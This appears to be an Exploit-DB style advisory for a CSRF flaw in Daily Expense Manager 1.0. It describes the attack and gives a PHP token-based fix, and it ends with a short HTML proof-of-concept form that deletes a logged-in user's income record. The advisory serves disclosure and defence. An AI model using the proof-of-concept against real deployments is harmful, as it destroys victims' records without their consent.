Vendor: Daily Expense Manager
By: Mr Winst0n
CVSS: 8.8 (HIGH)
CWE: 352 (Cross-Site Request Forgery (CSRF))
Product Name: Daily Expense Manager
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:daily_expense_manager:daily_expense_manager
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Parrot OS
Year: 2019

Daily Expense Manager – CSRF (Delete Income)

This exploit allows an attacker to delete an income record from the Daily Expense Manager application. The attacker crafts an HTML page containing a form that submits a POST request to homeedit.php with the delincome query parameter set to the ID of the income record to delete. When a logged-in user visits the page and submits the form, the browser attaches the user's session cookie, the application accepts the request because it carries no anti-CSRF token, and the income record is deleted.

Mitigation:

The application should implement a CSRF token system to prevent unauthorized requests from being accepted.
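As an added example (not the Daily Expense Manager project's own code), the following shows how a PHP delete handler such as homeedit.php can be protected with a synchronizer token: one random token per session, emitted as a hidden field in the application's own form and checked with a constant-time comparison before any deletion. It assumes PHP 7.3 or later, PHP sessions, a hypothetical delete_income() helper standing in for the application's real database code, and an assumed home.php landing page.

```php
<?php
// Added example, not code from the Daily Expense Manager project.
// Assumptions: PHP >= 7.3, session support, hypothetical delete_income() helper.

// SameSite=Strict keeps the session cookie off cross-site POSTs in modern
// browsers; the token check below is the primary defence and works everywhere.
session_set_cookie_params(['samesite' => 'Strict', 'httponly' => true]);
session_start();

// Issue one token per session: 32 random bytes, hex-encoded.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Validate the token sent with a state-changing request.
// hash_equals() compares in constant time to avoid timing leaks.
function csrf_valid(?string $submitted): bool {
    return isset($_SESSION['csrf_token'])
        && is_string($submitted)
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Hypothetical persistence helper; the real application runs its own SQL here.
function delete_income(int $id): bool {
    return true; // placeholder
}

// Deletion happens only on POST, only with a valid token, and the record id is
// read from the POST body rather than from the query string, so a bare link or
// a cross-site form like the PoC above cannot trigger it.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['delincome'])) {
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    $id = filter_input(INPUT_POST, 'delincome', FILTER_VALIDATE_INT);
    if ($id === false || $id === null) {
        http_response_code(400);
        exit('Invalid income id');
    }
    delete_income($id);
    header('Location: home.php'); // assumed landing page
    exit;
}
?>
<!-- The application's own delete form carries the token as a hidden field. -->
<form action="homeedit.php" method="post">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="hidden" name="delincome" value="778">
  <button type="submit">Delete income</button>
</form>
```

A cross-site page cannot read the victim's session token, so a forged POST arrives without a matching csrf_token field and is rejected with 403; the same guard should be applied to every other state-changing action in the application, not only to delincome.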

Exploit-DB raw data:

# Exploit Title: Daily Expense Manager - CSRF (Delete Income)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: August 8, 2019
# Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/
# Tested Version: 1.0
# Tested on: Parrot OS


# PoC:

<html>
<body>
	<form action="http://server/homeedit.php?delincome=778" method="post">
		<input type="submit" value="Click!" />
	</form>
</body>
</html>